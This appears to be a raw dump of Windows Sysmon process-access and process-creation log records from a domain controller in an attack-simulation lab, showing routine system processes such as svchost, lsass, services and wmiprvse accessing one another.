08:41:26.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002067Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002066Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002065Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002064Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.246{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16B6-5F84-5A00-000000007F01}3764C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002063Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.246{5D479F2C-169F-5F84-0A00-000000007F01}8562660C:\Windows\system32\services.exe{5D479F2C-16B6-5F84-5A00-000000007F01}3764C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002062Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.251{5D479F2C-16B6-5F84-5A00-000000007F01}3764C:\Windows\servicing\TrustedInstaller.exe10.0.14393.3564 (rs1_release.200303-1942)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000002061Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.246{5D479F2C-169F-5F84-0B00-000000007F01}864600C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002060Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002059Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002058Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.246{5D479F2C-169F-5F84-0B00-000000007F01}864600C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002057Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002056Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002055Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002054Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002053Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002052Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002051Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.215{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002050Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.215{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002049Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.215{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002048Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.215{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002047Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.215{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002046Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.215{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002045Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B6-5F84-5900-000000007F01}3904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002044Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002043Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 